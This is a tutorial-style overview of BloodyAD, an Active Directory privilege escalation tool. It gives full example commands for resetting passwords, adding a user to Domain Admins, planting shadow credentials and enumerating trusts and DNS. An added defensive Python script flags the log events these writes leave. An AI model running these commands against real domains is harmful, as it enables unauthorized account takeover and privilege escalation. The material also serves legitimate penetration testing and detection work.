BloodyAD - Active Directory Privilege Escalation Tool

BloodyAD is an open-source Active Directory (AD) privilege escalation tool designed to perform specific LDAP and SAMR calls to a domain controller.

It is a versatile "Swiss Army knife" for AD privilege escalation (privesc), offering a wide range of functionalities for security professionals and penetration testers.

Key Features of BloodyAD

  • Authentication Options: Supports multiple authentication methods, including cleartext passwords, pass-the-hash, pass-the-ticket, and certificate-based authentication.

  • Protocol Support: Communicates with LDAP/LDAPS/SAMR services on domain controllers.

  • Proxy Compatibility: Can be used transparently with a SOCKS proxy for operational stealth.

  • Sensitive Data Handling: Allows the exchange of sensitive information even without LDAPS encryption.

  • Cross-Platform: Works on Linux, macOS, and Windows.

  • Verbose Output: Provides detailed feedback to help users troubleshoot issues during operations.

  • Multi-Domain Support: Includes features for multi-domain environments, such as displaying domain trusts and DNS records.

Installation Requirements

To use BloodyAD, you need:

  • Python 3

  • Dependencies like MSLDAP, dnspython, Impacket, and DSinternals. These can be installed using the requirements.txt file:

pip3 install -r requirements.txt

For Kali Linux users, BloodyAD can be installed directly:

sudo apt install bloodyad

Usage Overview

Authentication and Connection

BloodyAD connects to a domain controller using various authentication methods. A typical command includes parameters for the domain (-d), username (-u), password or hash (-p), and the target host (--host).

Example:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123!

Common Commands

Get Commands

Retrieve information from Active Directory:

1. Children Objects:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123! get children --target "Domain Admins"

2. DNS Records:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123! get dnsDump

3. Group Memberships:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123! get membership john.doe

Set Commands

Modify AD objects:

1. Change Passwords:

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! set password john.doe 'NewPassword!'

2. Modify Attributes:

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! set object john.doe description "New Description"

Add Commands

Add new objects or permissions in AD:

1. Add User to Group:

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! add groupMember "Domain Admins" john.doe

2. Add Shadow Credentials (for impersonation):

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! add shadowCredentials john.doe
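Each of the set and add commands above is a directory write that a domain controller records in its Security log. The following is an added example (not part of BloodyAD) of a small triage script run over constructed sample records for those writes: group membership added to a privileged group, an administrative password reset, and the msDS-KeyCredentialLink write behind a shadow credential. The event IDs and field names are the standard Windows Security log ones; the sample records, the watch list and the Finding class are assumptions for the example.

```python
# Added example, not part of BloodyAD: triage directory writes that the
# set/add commands leave in the Security log. Sample events are constructed.
from dataclasses import dataclass

GROUP_MEMBER_ADDED = {4728, 4732, 4756}  # member added to global/local/universal group
PASSWORD_RESET = 4724                     # password reset attempted by another account
DS_OBJECT_MODIFIED = 5136                 # attribute written on a directory object
SHADOW_CRED_ATTR = "msDS-KeyCredentialLink"
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}  # assumed watch list


@dataclass
class Finding:
    event_id: int
    actor: str
    target: str
    reason: str


def triage(events):
    """Return one Finding per event that matches a sensitive write pattern."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        actor = ev.get("SubjectUserName", "?")
        if eid in GROUP_MEMBER_ADDED and ev.get("TargetUserName") in SENSITIVE_GROUPS:
            findings.append(Finding(eid, actor, ev["MemberName"],
                                    f"added to privileged group {ev['TargetUserName']}"))
        elif eid == PASSWORD_RESET and actor.lower() != ev.get("TargetUserName", "").lower():
            findings.append(Finding(eid, actor, ev["TargetUserName"],
                                    "password reset by another account"))
        elif eid == DS_OBJECT_MODIFIED and ev.get("AttributeLDAPDisplayName") == SHADOW_CRED_ATTR:
            findings.append(Finding(eid, actor, ev["ObjectDN"],
                                    "msDS-KeyCredentialLink written (possible shadow credential)"))
    return findings


# Constructed sample records, shaped like the fields of the real Security log events.
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "admin", "TargetUserName": "Domain Admins",
     "MemberName": "CN=john.doe,CN=Users,DC=bloody,DC=local"},
    {"EventID": 4728, "SubjectUserName": "admin", "TargetUserName": "Sales",
     "MemberName": "CN=jane.roe,CN=Users,DC=bloody,DC=local"},          # benign group, not flagged
    {"EventID": 4724, "SubjectUserName": "admin", "TargetUserName": "john.doe"},
    {"EventID": 5136, "SubjectUserName": "admin", "ObjectDN": "CN=john.doe,CN=Users,DC=bloody,DC=local",
     "AttributeLDAPDisplayName": SHADOW_CRED_ATTR, "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "admin", "ObjectDN": "CN=john.doe,CN=Users,DC=bloody,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},  # not flagged
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.event_id} {f.actor} -> {f.target}: {f.reason}")
```

Auditing of directory changes (5136) must be enabled on the domain controllers for the msDS-KeyCredentialLink write to be logged at all.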

Advanced Functionalities

1. Security Descriptor Resolving:

Use --resolve-sd to translate raw security descriptors into readable permissions.

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! get search --resolve-sd

2. Multi-Domain Operations:

Display trusts between domains or enumerate DNS records across domains.

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! get trusts

3. Automated Privilege Escalation:

Combine BloodyAD with tools like BloodHound and Neo4j for automated attack path generation (pathgen.py) and execution (autobloody.py).

Practical Applications

BloodyAD is particularly useful for:

  • Enumerating AD objects, permissions, and relationships.

  • Exploiting weak permissions like GenericAll or WriteOwner to escalate privileges.

  • Automating complex privilege escalation paths in multi-domain environments.

  • Testing the security of AD configurations during penetration tests or red team exercises.

Acknowledgements

The development of BloodyAD is inspired by several tools and libraries in the cybersecurity community:

  • MSLDAP library by @skelsec (core engine).

  • Impacket contributors (LDAP attack structures).

  • PowerView.ps1 by @PowerShellMafia (inspiration for AD enumeration).

  • adidnsdump.py by @dirkjanm and Invoke-DNSUpdate.ps1 by @Kevin-Robertson (DNS functionalities).

  • pydsinternals module by @p0dalirius (shadow credential attacks).

Conclusion

BloodyAD is a powerful framework for Active Directory privilege escalation, offering extensive features for reconnaissance, exploitation, and automation in AD environments.

Its flexibility and cross-platform support make it an essential tool for cybersecurity professionals seeking to understand and test AD security configurations effectively. You can learn more and download BloodyAD on GitHub.
